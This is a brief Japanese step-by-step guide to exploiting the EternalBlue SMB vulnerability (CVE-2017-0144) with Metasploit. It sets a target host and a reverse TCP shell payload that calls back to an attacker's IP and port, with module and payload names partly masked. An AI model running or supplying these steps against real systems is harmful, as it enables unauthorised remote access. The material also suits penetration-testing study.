安全性の観点より、コマンド、ソースコードは一部削除、改変済みです。
①Metasploitを使用したEternalBlueエクスプロイトの例
Metasploitは、ペネトレーションテストや脆弱性評価に広く使用されるオープンソースのフレームワークです。Metasploitを使用してCVE-2017-0144をエクスプロイトする手順を以下に示します。
②Metasploitを起動
msfconsole
③EternalBlueエクスプロイトモジュールを選択
use exploit/windows/smb/XXX_XXXX_eternalblue
④ターゲットホストのIPアドレスを設定
set RHOSTS 192.168.1.1
⑤ペイロードを設定(例: Windowsシェルをリバースで取得するペイロード)
set PAYLOAD windows/x64/XXXerpreter/XXXX_tcp
set LHOST <攻撃者のIPアドレス>
set LPORT <攻撃者が待ち受けるポート>
⑥エクスプロイトを実行
exploit
上記コマンドセットを実行すると、Metasploitはターゲットシステムに対して
EternalBlue脆弱性を利用し、指定したペイロード(リバースTCPシェル)を送り、
成功するとリモートシェルが開かれます。